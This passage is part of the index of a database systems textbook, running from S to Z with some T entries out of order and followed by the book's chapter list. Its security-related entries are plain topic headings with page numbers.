214, 218, 223-224, 226-228, 230, 233,
235-243, 252, 256, 258-259, 261-265,
268-271, 273, 278-280, 286, 287-291,
293-295, 301-303, 305, 319-325, 327-329,
335-336, 344-345, 347-349, 351-353,
355-356, 380, 394-396, 398-399, 401-403,
406-407, 411, 413-415, 419, 421-422,
425-428, 433-437, 440-453, 459, 465,
488-489, 506-507, 508, 510-514, 516,
520-531, 533, 535-538, 540-546, 549,
550-552, 558-562, 564-570, 573-575,
577-579, 581-585, 587, 706, 727, 729,
731-732, 759, 853-854, 860, 874, 884-885,
889-891, 896-897, 905-906, 925-928, 945,
984-985, 990, 994, 996, 1022, 1047-1048

Science, 2, 5-6, 26, 30, 54, 57, 108, 112, 147, 246,
404-409, 487, 996, 998, 1047

Screens, 331
Script, 169, 424, 491, 500
scripting, 454, 490-491, 505
scripts, 1025
scrolling, 1061
search engines, 37, 415, 994-996, 998-999, 1003,

1007-1010, 1017, 1019, 1026-1027,
1029-1030, 1032

Search keys, 668, 676
Search query, 994, 998, 1000

1078

Search tree, 652-654
searching, 23-24, 333, 438, 500, 597, 607-608, 615,

619, 637, 648-649, 651, 668, 673, 675-676,
678, 727, 801, 979, 992-995, 997, 999-1000,
1009, 1017, 1028

Searching the Web, 1017, 1019
Second normal form, 524, 530, 533, 543, 552
Secondary index, 637, 641, 644-647, 649, 673-674,

677-678, 719-722, 727, 741
Secondary memory, 959
Secret key, 864-865
sectors, 594
Security, 4, 13-14, 17, 24, 46-47, 57-58, 67, 79-80,

83-84, 106, 122, 135, 165, 205, 211,
236-237, 241, 279, 330-331, 352, 416,
461-462, 468, 472-473, 513, 517, 544, 565,
613, 665, 836-876, 883, 919, 925, 931, 951,
1027

authenticity, 841-842
availability, 13, 330-331, 837, 841, 868, 871
cryptography, 875
e-commerce and, 855
encryption and, 47, 836, 863-865, 873
failure, 840, 883
network, 46-47, 416, 839, 856-857, 883, 919, 925
threats, 836-838, 856, 863, 868, 871, 875

Security threats, 836
Seek time, 595-596, 598, 608, 629, 631-632, 634,

1054-1056
Segmentation, 964-966, 1026
Segments, 459, 467, 492, 603, 964, 966, 1028
SELECT, 37, 74, 92-93, 95-102, 104, 106, 117-126,

128-131, 133-136, 140, 142, 149-155, 160,
164, 178, 181-183, 188-189, 350, 372, 380,
403-410, 462-463, 468-470, 472, 475,
477-478, 483, 504, 517, 543, 665-666, 672,
686-688, 690-693, 703-706, 708-709,
713-716, 718, 724, 727-729, 742-745, 791,
813, 844-848, 857-859, 923, 933, 942, 957,
978-979, 981, 984, 1063-1064

Selection, 93, 95, 97, 140, 150-152, 158, 160, 164,
167, 181-182, 187, 194, 244, 354, 360,
439-440, 606, 678, 690-693, 698-699, 708,
711-713, 717-722, 724-725, 734-736, 742,
806, 860-861, 905, 924, 952-954, 956, 979,
1026, 1048, 1060

Selections, 520, 736, 954
selector, 431-432, 435
Semantic analysis, 1005
semantic data models, 246-247, 268-269, 271, 285,

356
Semantic Web, 273, 285, 441
Semantics, 19, 81, 130, 143, 232, 319, 411, 428,

510-511, 513, 521-523, 528, 543, 550, 559,
579, 868, 914-915, 925, 935, 937-939, 945,
948, 967-968, 988, 996, 1022

Semaphores, 909
Semijoin, 901, 904, 907, 920, 922, 925
Sensors, 868, 940
Sentinel, 988
Sequence, 82, 85, 133, 151-152, 154, 158, 160, 164,

177, 187-188, 203, 316, 328, 335-339,
341-342, 344, 352, 431-435, 437-440,
443-445, 456-458, 503, 602, 621, 662-664,
704-705, 711, 715, 763-765, 768, 773, 825,
833, 840, 860, 870, 966, 985

Sequence:, 663-664
Sequence numbers, 831, 833
sequence structure, 434
Sequencing, 329
Sequential access, 464, 597, 636, 650
Sequential file, 592, 607-608, 610, 649, 668, 676
Sequential files, 40, 679
Serializability, 748, 755-756, 760, 762-765, 767-774,

776-779, 780-781, 785, 787, 791-792,
794-795, 797, 805-807, 809, 886, 911

Serializable schedule, 766-767, 769, 776-778, 785,
801-802

server, 27-28, 40-48, 51-52, 55, 106, 311-312, 329,
358, 458, 460, 471, 473, 480-481, 491-494,
498-502, 505, 590, 627, 858, 869, 871,
884-885, 887, 892-894, 915-922, 926-927,
955, 1037, 1046

servers, 3, 22, 27, 40, 42-47, 312, 458, 460, 593,
595-596, 627-628, 859, 884, 886, 893, 919,
1027

compatibility, 45
web, 22, 27, 43, 45-46, 312, 628, 859, 1027

services, 40, 44, 46, 48, 311, 331, 627, 856, 862, 866,

882, 914-917, 919, 963, 999, 1017-1018,
1035

classification of, 48
utility, 40

sessions, 852
Set difference, 99, 121, 149, 156, 158, 176, 189,

696-697, 702-703, 705, 728-729, 981
Set intersection, 99, 176
Set theory, 55, 59, 81, 99, 149, 155
Setup, 626
Shamir, Adi, 866
Shared lock, 803
Sibling, 438, 659, 662, 664-665
Signals, 756
Signature, 10, 360, 365-366, 379, 391, 414, 855,

866-867
Simple Object Access Protocol (SOAP), 441
Simplicity, 45, 55, 320, 628, 734, 843, 848
simulation, 15, 333, 614, 656, 665, 912
Singapore, 245, 987
Single inheritance, 252, 257-258
Single precision, 1016
single-line comments, 492
site structure, 1025
slots, 598, 611
SMART, 1032
Snapshot, 31, 918, 945, 950
Snapshots, 918
SOAP, 441
social networking, 1018
Social Security number, 67, 79, 205, 211, 236-237,

262, 279, 461-462, 468, 472-473, 477, 511,
513, 517, 544, 565, 613, 665, 931, 951

Sockets, 855
software, 2-5, 7-9, 11-15, 17-18, 20, 23-26, 27-29, 31,

34, 38, 40-45, 47-48, 51-52, 56, 228, 246,
259, 266, 282, 310-311, 313-314, 329-332,
334-336, 348-349, 352, 355, 413, 436, 456,
501-502, 598, 622, 627, 629, 674, 882-884,
886, 907, 909, 914, 917-918, 920-921, 937,
1023, 1046

malicious, 4
system components, 44

software and, 8, 13-14, 40, 43, 334, 627
software developers, 14, 334
Software engineering, 26, 29, 41, 56, 201, 259, 266,

314, 332, 334-335, 349
Solution, 232, 372, 528, 623-624, 631, 716, 738,

789-791, 804, 855, 879, 904, 962
Sorting, 41, 153, 497, 605, 607-608, 635, 673,

687-689, 694, 699, 702, 704, 716, 722, 730,
734, 745, 768, 1045

sound, 282, 554, 575, 579, 967
speakers, 967

Source, 2, 40-41, 48, 51, 55, 189, 336, 356, 425, 456,
465, 471, 476, 483-484, 490-491, 505,
871-872, 891, 917, 920, 963-965, 1010,
1017, 1020, 1022, 1037, 1043, 1047

source code, 336, 465, 471, 483-484
Source program, 456
Spaces, 129, 601
spam, 1027

filtering, 1027
Spanned blocking, 634
Sparse index, 638, 741
Specifications, 7, 14, 35, 124, 130, 187, 204, 313, 319,

329, 333, 342, 344, 374, 386, 389, 391, 394,
400, 434-435, 441, 595, 917

Speed, 17, 34, 248, 251-253, 297, 306, 588-590, 596,
623, 627, 631, 636, 641, 654, 698, 734, 868,
960

Spindle, 593
Spiral, 594
spreads, 322
spreadsheets, 1046
SQL:, 115-147, 374, 377, 729, 846
Stack, 660-661, 665
stakeholders, 318
Standard deviation, 860
standards, 20, 41, 53, 82-84, 143, 348, 358-359, 437,

440, 455, 774, 854-855, 863-864, 893, 935,
941, 964, 997, 1032

Star schema, 1040-1042, 1048
Starvation, 781, 788, 791, 793, 806-807
State, 7, 18, 30-31, 50-51, 58-60, 62-66, 68-69, 71,

75-76, 78, 80, 92, 94, 109, 111, 114, 174,
190, 193, 195, 199, 209-212, 237-239, 241,
275-276, 280-281, 301-303, 305, 311, 318,
328, 339-341, 359-360, 365, 381-382,

389-390, 392, 396, 433, 512, 516-517, 519,
525-527, 538-542, 544, 546-547, 551, 553,
555, 560-562, 574-576, 578, 633-634, 670,
732, 755-759, 766-767, 777-778, 795, 801,
824, 908, 923, 944-948, 950-951, 983,
985-986, 990

Statecharts, 339
Statement, 36, 83-85, 87, 89-93, 97, 103, 106, 115,

131-132, 135, 139-140, 189, 367, 459-461,
466, 468, 472-475, 478-480, 482-484, 503,
671-672, 727, 774, 778, 844, 854, 857-859,
870, 916, 934-935, 937-942, 954, 981,
983-984, 987

Statement-level trigger, 935, 941
States, 31, 57, 62-63, 66, 69-70, 72, 186, 189, 207,

219, 339-341, 366, 511, 515, 521-522, 542,
581, 755-756, 761, 772, 776-777, 781, 801,
807, 851, 863-864, 955, 958, 962, 968-970,
982

exit, 341, 777
transition, 339-341, 756
waiting, 783, 807

Statistics, 40-41, 312, 333, 724, 730, 735, 739-740,
745, 838-839, 956, 997, 1000, 1012,
1024-1025

Stemming, 1000, 1009, 1012, 1029, 1031-1032
Steps, 130, 162, 288-290, 293, 296, 336, 341, 353,

402, 415, 465, 473, 477, 528, 532, 623,
684-685, 688, 705, 709, 713-714, 750, 865,
869, 924, 999, 1010-1012, 1020

Storage devices, 20, 588-589, 591-592, 597, 627-629,
635

backup, 591, 597, 829
removable, 589

storage management, 627, 824
storing, 3, 7-8, 15, 46, 48, 280, 357-358, 399, 430,

435-436, 447, 514, 525, 588, 593, 600, 613,
623, 626, 629, 700-701, 716, 737-738, 957,
993, 1000, 1065

Storing data, 8, 600
Streaming, 428
Strict schedule, 763, 788, 822
String, 5, 19, 23, 57-58, 87-89, 100-101, 211, 324,

366, 382, 385, 391, 393, 396-397, 403-406,
408, 410-411, 432-433, 443-445, 456,
460-462, 465, 467, 469-470, 472-474,
477-480, 493-495, 497, 499-502, 600,
612-613, 617, 857-859, 866, 952, 1024

default value, 89
String class, 396
string comparisons, 89, 743
String data, 87, 101, 429, 505
String data type, 87, 429
String data types, 87, 101, 505
String functions, 495
strings, 37, 57, 64, 87-89, 100, 151, 362-363, 382,

411, 484, 493-496, 503, 505, 600, 612, 859,
969, 999

concatenation of, 666
escape characters, 859
length of, 87-88

Stripe, 626
Striping, 623-626, 635
Strongly typed, 372
struct, 8, 362-363, 374, 382, 385, 390-391, 396, 398,

401-402, 405-406, 408-410, 600
Structure, 3-4, 8-11, 17, 20-21, 28-32, 41, 48, 50, 56,

75, 92, 140, 148, 166, 210, 273, 312,
315-316, 318-319, 335-336, 357-360, 362,
365, 373-374, 381-382, 390, 400-401,
403-405, 410, 412, 420-422, 441-442,
445-447, 461, 465, 467, 482-483, 592, 600,
616-618, 620, 622, 630, 633, 651-655, 660,
665, 667-668, 673-676, 682-683, 686,
705-707, 721, 723, 802, 975, 998,
1011-1013, 1018-1020, 1024-1025, 1033,
1035-1036

decision, 319, 401, 1035-1036
structures:, 410
styles, 424, 1039-1040
Stylesheet, 420, 441
Subclass, 246-262, 264-266, 269-270, 274-275, 285,

296-299, 307, 401-402, 551, 578, 582, 1010
submit, 244, 421, 490, 492-493, 498, 763
Subscript, 625, 760
Subtraction (-), 101
Subtrees, 438, 651, 653, 714
Subtype, 247-248, 369-372, 379, 387, 389, 392, 414
Sum, 124-125, 130, 134, 137, 142, 169, 171, 407,

1079

517, 570, 596, 624, 668, 687, 726, 753, 804,
939-940, 942, 955, 984-985, 1003,
1020-1021, 1062

Sun Microsystems, 471, 476
superclasses, 247, 252, 257, 259-261, 265-266,

299-301, 322, 402
Superkey, 65, 76, 153, 525-526, 535-537, 541-542,

558, 574-575
Supertype, 248, 369-370, 372, 379, 387, 389, 392
Support, 1, 8, 11, 19, 23-25, 28, 31, 33, 36, 47-49, 51,

70, 103, 189, 263-264, 271, 275, 311, 329,
343, 347, 352-353, 394, 412, 628, 634,
674-675, 736-737, 774, 779, 799, 839, 853,
890, 914-915, 920-922, 924, 951, 955, 962,
965, 989, 1006-1008, 1034-1037,
1041-1042, 1044-1049, 1063

SUPREME, 866
Surrogate key, 232, 300-301, 947
Surveillance, 964
Switches, 497, 627-628

hubs and, 627
Sybase, 42, 55, 311-312, 328, 350, 352, 501, 741, 876
Symbols, 140, 180, 234, 429, 435, 503, 562-563, 584,

657, 866, 969, 971, 1002-1003, 1050-1052,
1056

Synchronization, 329, 347, 862, 914
Syntactic analysis, 1005
syntax, 36, 38, 83, 107, 109, 132, 140-141, 171, 178,

188-189, 367, 377-378, 394, 402-404,
410-411, 413, 428, 483-484, 684, 759,
855-856, 916, 931-932, 935, 942, 971, 981,
984, 1021

details, 36, 38
Syntax errors, 483
Syntax rules, 430, 684
system architectures, 42, 626, 887-888, 920
System bus, 43
System Catalog, 39-40, 333
system clock, 792
system development, 355
System documentation, 312
system error, 754
system failures, 761
SYSTEM GENERATED, 375-378
system log, 755-757, 763, 776-777, 811, 815-817,

821, 829-831, 840
System R, 83, 106, 716, 730, 835, 875, 926
System response time, 13
system software, 14, 27, 38, 52, 622, 629

T
Table:, 124, 139, 380, 949

, 424
Table:

base table, 139
Table scan, 672, 703, 724-726
tables, 19, 26, 48, 75-76, 83-85, 98, 102, 105-107,

115, 117, 119, 123-124, 129-130, 133-141,
149, 160, 172-173, 189, 193-194, 291-292,
319, 336, 346, 351, 376, 457, 460, 503,
505-506, 647, 674, 713, 716, 737-739,
741-744, 756, 824-828, 844, 869-870, 908,
916, 940-941, 954-955, 1040-1042, 1065

attributes of, 119, 123-124, 134, 160, 173, 193,
289, 291-292, 460, 742, 844, 950

Master, 742, 918, 941
Super, 85, 117, 123-124, 172, 292, 1065

Tag, 423-428, 434-435, 437-438, 491, 493, 497, 500
Tags, 49, 422-425, 427-428, 433-435, 438, 448, 491,

493, 500, 967
tape drives, 43, 591, 598, 628
Tapes, 589-592, 597-598, 630, 755, 829
Task, 3, 49, 321, 329, 337, 349-350, 483, 673, 684,

755, 845, 853, 880, 915, 963, 994-995, 997,
1008, 1011, 1018, 1022, 1047-1048

TCP/IP, 629

, 423-424, 497
Tracing, 757
Track, 7, 15, 79, 138, 191, 201, 204-205, 221, 233,

236-239, 256, 262, 275-279, 344, 472, 476,
544, 593-596, 607, 615, 629-631, 649, 717,
755, 776, 782-783, 812, 840, 845, 898, 955,
980, 982, 1054-1056

Trademark, 471, 476
Traffic, 912-913, 958
Training set, 1021
Transaction, 4, 8, 11-12, 18, 20, 25, 39-40, 45, 48, 56,

75-76, 83-84, 203-204, 283, 310-312, 315,
318-319, 328-329, 332-333, 355-356, 464,
610, 739-740, 742, 746, 747-779, 780-785,
787-801, 803-805, 807-809, 810-835, 840,
863, 877-878, 890-894, 907-912, 917, 920,
922, 926, 931, 936-937, 940, 944-945,
947-952, 954, 962, 982-983, 1042

Transaction file, 610
Transaction manager, 800, 825, 828, 890, 907-908
transaction processing systems, 310, 312, 747-748
Transfer time, 596-597, 629, 631-632, 634, 1055-1056
transferring, 41, 597-598, 605, 716, 902, 904,

1054-1055
Transitive rule, 553, 558, 575
Translator, 466
Transmission, 628-629, 861, 863

transparency, 879-882, 886, 889, 894, 905, 913, 916,
920-921, 1037

Traversal, 800
Traverse, 364, 403, 428, 658, 800
tree structure, 256, 427-430, 438, 442, 446-447, 652,

657
Trees, 166, 183, 189, 446, 588, 592, 622, 651-652,

656-657, 660, 665, 674-675, 679, 706-708,
714, 723-724, 728-730, 736, 741, 807, 924,
960, 964-965, 982-983, 988

implementations of, 657, 982
Trigger, 19, 70, 115, 131-133, 139, 621, 931, 933-938,

941-942
trimming, 1009
trust, 843, 867-868
Truth value, 179, 184, 974
Tuning, 18, 38, 313, 315-317, 333-334, 350, 356, 589,

733-746
Tuple, 57-58, 60-66, 69-70, 72-77, 80, 83-84, 89,

91-93, 95-99, 102-103, 105, 116-124, 126,
130, 132, 136-139, 149-153, 158, 160-162,
164-167, 170-174, 177-181, 184-190, 194,
197-198, 270, 290, 292-293, 295, 297-298,
300, 361-364, 366, 373-374, 378, 390,
401-405, 461-462, 468, 470-472, 479-480,
483, 513-517, 525-529, 538-539, 546-548,
562, 570, 572, 577, 581, 583-584, 666,
696-697, 702, 849-851, 904-905, 945-951,
953-954, 961, 968, 982-983, 985, 1040

Tuple variable, 93, 119, 178-181, 184, 190, 194, 687,
941

Two-dimensional array, 479
two-dimensional arrays, 495
Two-phase locking, 772, 780-781, 785-787, 789, 795,

801, 805-808, 822, 925
type attribute, 220, 264, 296-300, 434
Type compatibility, 156
Type constructor, 362-363, 374

U
UDT, 374-375, 377-379
UML diagrams, 269, 309-356
Unary operator, 155
Unauthorized disclosure, 837
UNDER, 3, 22, 24, 77, 122, 233, 235-236, 239, 244,

296, 298, 302, 331-333, 339, 349, 374-376,
379-380, 434, 438, 444, 447, 471, 491, 502,
513, 596-597, 624, 634, 665, 728-729, 746,
773, 785-786, 796-797, 811-812, 846,
853-854, 870, 916, 918, 922, 924, 937,
966-967, 974-975, 977, 980-981, 1054,
1061-1064

Underflow, 662, 664-665
underscore character (_), 494, 1058
Unified Modeling Language (UML), 202, 226
Union:, 156
UNIQUE, 19, 36, 50, 52, 57, 66, 70, 77, 86, 90-91,

120, 122, 131, 145-146, 237, 241, 243-244,
270, 277-278, 282-284, 346, 367, 377-378,
381-382, 386, 389, 391-392, 406-407, 496,
503, 528, 547, 581, 583, 637-638, 653, 655,
674-675, 725, 727, 734-737, 741, 750, 780,
792, 907, 925

United States, 57, 205, 207, 521-522, 837, 864, 886,
962

Universal access, 1017
University of California, 1028
UNIX, 491, 628
UNKNOWN, 58, 61, 75, 97, 116-117, 208, 517, 861
unsigned short, 382-384, 393, 411
Unspanned blocking, 632, 634
Update, 3, 11, 14-15, 17-20, 26, 31, 34, 36, 40, 50, 56,

70-77, 90-91, 102, 104-109, 132-138, 142,
146, 293, 328, 333, 342, 346-347, 365, 401,
463-465, 513-514, 524, 543, 545, 549, 576,
606, 653, 665, 734-737, 751-753, 759, 762,
773-775, 800-801, 810-812, 814-815,
818-822, 827-828, 830-833, 847, 875, 905,
913, 922, 926, 931-942, 946-950, 959, 961,
981, 983, 985, 1058, 1064-1065

Update command:, 465
updating, 3, 7, 11, 13, 19, 42, 74, 104, 132-133, 136,

316, 455, 465, 493, 734-735, 737, 752, 775,
815-816, 823, 829-831, 911-912, 949-951,
959, 1043-1044

upgrades, 628, 788
USAGE, 23, 41, 312, 334, 716, 727, 739, 881, 942,

988, 1009, 1018, 1024-1027, 1029, 1031,
1033, 1042, 1044

1080

USB (Universal Serial Bus), 590
Use case, 335-338, 341, 352
use cases, 336-337, 341-342, 344
Use of information, 842
User:, 851
User authentication, 856, 919
User interface, 42, 44-46, 329, 338, 892-893, 1060
user profiles, 855
user requirements, 239
User-defined, 28, 106, 253-254, 265, 274, 347, 370,

374, 378, 382, 386, 389-390, 392, 413-414,
945

User-defined functions, 378
users, 1-26, 28-29, 32-42, 45-48, 51-52, 82, 84, 106,

123, 130-131, 143, 201-202, 204, 212-213,
222, 237, 253, 259, 273, 309-318, 320-322,
334, 336-337, 353, 358, 367, 380, 392, 413,
425, 517, 525, 592, 606, 627, 673, 747-749,
763, 829, 836-844, 848-852, 854-858,
862-863, 869, 874, 881-884, 913-914, 919,
926, 958, 963, 982, 993-995, 997-998,
1006-1007, 1014, 1017-1019, 1023-1030,
1045, 1048

UTF, 431
UTF-8, 431

V
Valid values, 74, 502
Validation, 313-314, 337, 484, 772, 780, 794, 797-798,

805-806, 859, 1028
Value, 10, 15, 19, 31, 57-58, 60-66, 69-70, 72-75,

87-89, 95, 98, 100-101, 103, 105, 107,
116-120, 123, 125-128, 160, 173-174,
178-179, 184, 186, 195, 206-209, 211-212,
216, 220, 230, 235-237, 253, 294-295, 351,
359, 361-364, 368-369, 377-378, 380-382,
384-386, 388-392, 400, 403, 406, 410, 430,
438-440, 474, 482, 484, 492-500, 516-517,
521-522, 540, 543, 581, 583, 592-593,
599-604, 606-622, 629-630, 632-634,
637-649, 651-660, 662, 665-669, 671-675,
703-704, 721-722, 724-726, 750, 760-763,
772-775, 780-781, 792-796, 804, 813-814,
816-822, 833-834, 841, 849-851, 914, 951,
964-965, 968, 970, 974, 977, 1003,
1023-1025, 1054, 1058-1060

initial, 31, 87, 212, 216, 351, 377, 492, 619,
765-767, 854

truth, 116, 179, 184, 974
Values, 5, 16-17, 19, 52, 55-66, 69, 72-76, 85, 87-90,

92-93, 95, 100-105, 116-119, 122, 124-126,
130, 137, 146, 150-151, 153, 158, 169,
172-176, 178-180, 182, 185-187, 196,
206-208, 221, 234, 237, 270, 292-293, 295,
344, 360-363, 366, 369-370, 373, 380, 386,
389-390, 400-401, 404-405, 413, 421-422,
426-427, 437, 447, 461-462, 468-469,
473-474, 481-482, 492-497, 499-503,
514-517, 520-522, 526-528, 536, 538, 540,
545, 562, 599-602, 604-608, 612-615,
617-618, 632-633, 652-659, 662, 666-671,
675, 677-679, 682-683, 690-694, 702-703,
716-720, 726-727, 739, 757-759, 775-776,
780-781, 838, 849-851, 860-861, 950-951,
963-964, 968-974, 976-978, 1003-1004,
1059-1063

undefined, 61, 116
Variable, 17, 64, 87-88, 93, 119, 178-181, 184,

186-187, 190, 194, 360, 363, 404-405, 408,
410, 434, 439-440, 459-462, 472-474, 479,
482, 492-494, 496-497, 499-500, 502-504,
600-603, 605, 607, 629-630, 632, 781-782,
859, 914, 941, 969, 977-978, 993,
1058-1061, 1063

variable declarations, 459
variables, 17, 95-97, 119, 150, 178-181, 186-187, 189,

194, 360-361, 365, 369, 403-404, 410-411,
414, 439, 457, 459-463, 465, 467-470,
473-475, 477, 479, 483-484, 494-497, 499,
585, 962, 968, 970-974, 977-978, 1026,
1058-1062

data type of, 479
values of, 17, 97, 178-180, 186-187, 361, 496, 499

Vector, 892, 965, 996, 999-1000, 1002-1004, 1013,
1029-1030, 1032

vector graphics, 892
vertical bar, 87
video, 1, 23, 282, 590, 600, 623, 930, 963-964,

966-967, 982, 998, 1017, 1029

View, 11-13, 25, 32-33, 35, 51-52, 85, 104, 130,
133-137, 140, 142-143, 251, 315, 321-322,
325-327, 340, 350, 352-353, 355, 386,
406-407, 442-445, 744, 766-767, 772-773,
776-777, 779, 794, 843-845, 849, 854,
869-870, 873, 876, 889, 913, 916, 936, 988,
1022-1024, 1026, 1048-1049

View:, 847
viewing, 251, 636, 854, 1025
Visual Basic, 352, 892
volume, 326, 330, 626, 742, 868, 887, 902, 989, 993,

1034, 1037, 1043-1044
Vulnerability, 851

W
Wait-die, 789-791, 806-807
Web, 1, 18, 22, 24-25, 36-37, 43, 45-46, 49, 51-53, 56,

273, 285, 312, 329-331, 420-425, 427, 433,
436-437, 456, 480, 486, 490-506, 628, 745,
855-859, 892, 925-926, 967, 992-1033

Web analytics, 1026
web browsers, 892
Web page, 421, 425, 490, 493, 500, 505, 999,

1018-1021, 1027, 1033
Web pages, 22, 24, 37, 46, 420-423, 425, 490-491,

493-494, 504, 878, 892, 993-994, 996,
998-999, 1018-1027, 1031

Web server, 46, 491, 500, 858
Web servers, 22, 27, 43, 1027

name of, 1027
Web services, 441
Web Services Description Language (WSDL), 441
Web sites, 476, 505, 745, 868, 1017
websites, 356, 879, 1027
WELL, The, 651
Well-formed XML, 428, 855
what is, 26, 51-52, 76, 177, 190, 194, 236, 274-275,

353, 414-415, 448, 456, 485, 505, 544-546,
583, 630-631, 676, 728-729, 776-778, 799,
806, 873-874, 984, 998, 1030-1031, 1039,
1044, 1048

Where-clause, 120, 687, 727, 743, 775, 857
while loop, 470
While-loop, 503
Wiki, 1020
Wikipedia, 1020
Windows, 491, 628
Wireless networks, 47
WITH, 1-4, 7-10, 12-14, 16-19, 21-26, 27-28, 31, 33,

35-52, 55, 59-66, 70-77, 79-81, 82-84,
87-93, 95-98, 100-107, 115-126, 128-130,
136-143, 149-152, 155, 158, 160-164,
166-176, 178, 180, 182-183, 185-190,
193-195, 198, 204-205, 207-214, 217,
221-223, 226-230, 232-233, 235, 242-243,
247, 249, 251, 255-260, 264-269, 271,
275-278, 280-284, 289-293, 295-299, 307,
316-322, 328-331, 333, 335-342, 344-345,
348-349, 351, 354-355, 358-362, 365,
369-370, 372-374, 378-379, 386, 388-390,
392, 394, 399-402, 405-406, 409-413,
415-416, 427-428, 434, 436-439, 441,
443-448, 461-472, 474-480, 484-485,
490-504, 519-525, 532-542, 544-548,
556-562, 564-579, 581, 583-584, 588-598,
600-602, 604-610, 612-615, 617-635,
640-641, 643-646, 651, 653-683, 686-687,
691-693, 695, 698-705, 711-715, 717-724,
733-738, 740-744, 750-752, 756, 758-761,
776-777, 781-783, 786-801, 803-806,
810-814, 818-819, 821-826, 828, 839-854,
856-875, 878-898, 901-902, 904-905,
907-916, 919-923, 931, 933-937, 940-944,
946-958, 960-975, 977, 981-982, 984-986,
989, 992-1000, 1002-1008, 1010-1012,
1014-1022, 1024-1026, 1028-1033,
1039-1049

With check option, 137
Words, 2, 37, 60, 77, 177, 194, 266, 273, 359, 526,

533, 569, 843, 853, 964, 995, 999-1000,
1005-1011

frequency of, 1002, 1008
workflows, 853, 926
Workstation, 27, 311
World Wide Web, 1, 22, 331, 878, 995, 997,

1017-1019, 1033
standards and, 997

World Wide Web (WWW), 878
Worm, 590

Wound-wait, 789-791, 806-807
WRITE, 4, 21, 38, 40, 77, 82, 90, 96, 103, 107, 109,

121-122, 124-126, 129-131, 133, 139, 154,
177-178, 184, 186, 191, 194, 386, 405-409,
439, 459, 465-467, 480, 482, 485, 506, 547,
584, 590, 595-598, 624-625, 630, 632,
748-751, 755-764, 766-768, 770, 772-775,
777-778, 781-789, 792-799, 803-805,
810-825, 830-835, 862-863, 907, 923-924,
970, 977, 984-985, 1001, 1054-1056

Write operation, 755, 757, 763, 766, 772, 793-794,
801

writing, 20, 85, 96, 105, 131, 178, 187, 194, 253, 318,
333, 366-367, 372, 412, 420, 458, 465-466,
472-473, 482, 582, 598, 604-605, 625, 685,
689, 701, 726, 758, 767, 812, 824-825,
833-834, 849, 863, 869, 937-938, 1021

X
XML, 22, 47, 49, 51, 53, 83, 209, 374, 420-448,

450-453, 836, 854-856, 876, 892-893, 926,
993-994, 1021, 1027

XML (Extensible Markup Language), 420
XML Schema, 421, 427-428, 430-431, 433-437, 440,

442-448
XPath, 421, 431-432, 435, 437-439, 447
XSL (Extensible Stylesheet Language), 420
XSLT, 420, 441

Y
y-axis, 1016
Yield, 160, 185, 249, 298, 528, 543, 565, 578, 670,

740, 968

Z
Zero, 87, 100, 104, 163, 218, 224, 244, 341, 369, 399,

404, 429, 439, 495-496, 621, 754, 813, 870,
1003, 1052

ZIP codes, 670, 923, 956
Zone, 88

1081

Cover
Contents
1. Databases and Database Users
2. Database System Concepts and Architecture
3. The Relational Data Model and Relational Database Constraints
4. Basic SQL
5. More SQL: Complex Queries, Triggers, Views and Schema Modification
6. The Relational Algebra and Relational Calculus
7. Data Modeling Using the Entity-Relationship (ER) Model
8. The Enhanced Entity-Relationship (EER) Model
9. Relational Database Design by ER- and EER-to-Relational Mapping
10. Practical Database Design Methodology and Use of UML Diagrams
11. Object and Object-Relational Databases
12. XML: Extensible Markup Language
13. Introduction to SQL Programming Techniques
14. Web Database Programming Using PHP
15. Basics of Functional Dependencies and Normalization for Relational Databases
16. Relational Database Design Algorithms and Further Dependencies
17. Disk Storage, Basic File Structures, and Hashing
18. Indexing Structures for Files
19. Algorithms for Query Processing and Optimization
20. Physical Database Design and Tuning
21. Introduction to Transaction Processing Concepts and Theory
22. Concurrency Control Techniques
23. Database Recovery Techniques
24. Database Security
25. Distributed Databases
26. Enhanced Data Models for Advanced Applications
27. Introduction to Information Retrieval and Web Search
28. Overview of Data Warehousing and OLAP
Appendix: Alternative Diagrammatic Notations for ER Models
Appendix: Parameters of Disks
Appendix: Overview of the QBE Language
Index
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z

, 424, 496
Technology, 1-2, 7, 24-25, 47, 246, 259, 268, 310, 312,

348, 351-352, 413, 441, 589-590, 593, 595,
598, 622-623, 626, 628-631, 635, 842-843,
852, 854, 863, 869-870, 876, 997-998, 1028

Temperature, 940, 958
Tertiary storage, 589-591
Testing, 64, 201, 313-314, 333, 465, 530, 533, 543,

564, 586, 767-768, 770-771, 773, 776, 863,
881

automated, 314
Tests, 509-510, 523-524, 532, 552, 1065
text, 2-3, 24, 37, 40, 43, 79, 87, 239, 241, 266, 331,

346, 420, 423-427, 447, 465, 471, 483,
490-495, 498-499, 522, 600, 839, 855, 866,
878, 886, 916, 963-964, 987, 992-994,
996-999, 1006-1008, 1010-1012, 1018-1019,
1023, 1025, 1031-1032

Text:, 494
text

alternative, 430
text editor, 495, 914
Text file, 491
Text files, 40
text processing, 24, 494, 1008
Thesaurus, 273, 1000, 1006-1007, 1009-1012,

1031-1032
this object, 338, 913
Threads, 336
Threats, 836-838, 856, 863, 868, 871, 875
Three-tier architecture, 45, 51, 491, 505
Three-tier client/server architecture, 46
Three-valued logic, 81, 88, 116, 517
Threshold, 621, 861, 941
Throughput, 333, 598, 739-740

average, 333
Time, 1, 4, 10-11, 13, 19-21, 23-24, 30-31, 33, 36, 47,

63-65, 82-83, 87-89, 101, 104, 114, 125,
134-136, 164, 191, 210-212, 218, 227,
238-239, 241, 256-257, 263-265, 267, 270,
275-276, 283, 302, 311-312, 330-332,
336-338, 343, 381-383, 387, 411-412, 418,
425, 462-463, 465, 496-497, 551, 558, 578,
586-587, 590-592, 595-600, 604-605, 615,
617, 619, 623-625, 629-634, 640, 654,
688-689, 691, 698, 700-702, 715-718, 723,
726-728, 735, 747-750, 752-755, 758-759,
762-765, 770, 773-774, 785-786, 789-792,
824-825, 827-828, 869, 908-909, 912,
924-925, 941-955, 963-964, 967, 973,
982-983, 985-986, 988, 991, 1024-1025,
1035-1037, 1047, 1054-1056

Time:, 1056
Timeout, 791, 806
timeouts, 788, 791, 805
Timestamp, 64, 88-89, 101, 125, 382-384, 389, 411,

772, 780, 791-795, 797, 803-808, 866,
943-944, 947-950

Timestamps, 772, 780, 789-792, 795, 797, 799, 803,
805-806, 925

Timing, 734-735, 862-863
title, 3, 79, 108, 191-193, 244, 262, 276-277, 283, 327,

424, 453, 485, 489, 507, 547, 738, 985
Tokens, 684, 1007, 1011
tools, 7, 15, 25, 52-53, 56, 70, 201, 204, 232, 272,

